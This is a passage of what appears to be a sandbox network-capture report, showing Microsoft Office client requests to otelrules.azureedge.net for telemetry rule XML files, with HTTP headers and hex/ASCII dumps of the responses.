                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    104192.168.2.56047213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:36 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                    x-ms-request-id: 8f4dae4f-901e-008f-19cb-2767a6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-17c5cb586f672xmrz843mf85fn00000005dg00000000001t
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    105192.168.2.56047313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                    x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-16849878b78nx5sne3fztmu6xc00000007gg0000000062bh
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    106192.168.2.56047413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1389
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                    x-ms-request-id: 9bc6d014-801e-008f-4946-262c5d000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-r197bdfb6b4wmcgqdschtyp7yg00000006bg00000000aast
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    107192.168.2.56047513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1352
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                    x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-16849878b78qg9mlz11wgn0wcc0000000620000000009yxz
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    108192.168.2.56047613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1405
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                    x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-16849878b78qfbkc5yywmsbg0c000000067g000000004due
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    109192.168.2.56047813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1401
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                    x-ms-request-id: 7f6d22c4-101e-0046-21f0-2591b0000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-15b8d89586ff5l62aha9080wv000000007rg000000009mg8
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    110192.168.2.56047713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:37 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1368
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                    x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120837Z-16849878b78tg5n42kspfr0x4800000006f000000000beue
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    111192.168.2.56048113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1364
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                    x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120838Z-16849878b78fhxrnedubv5byks00000004vg000000006ncb
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:38 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    112192.168.2.56048052.149.20.212443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
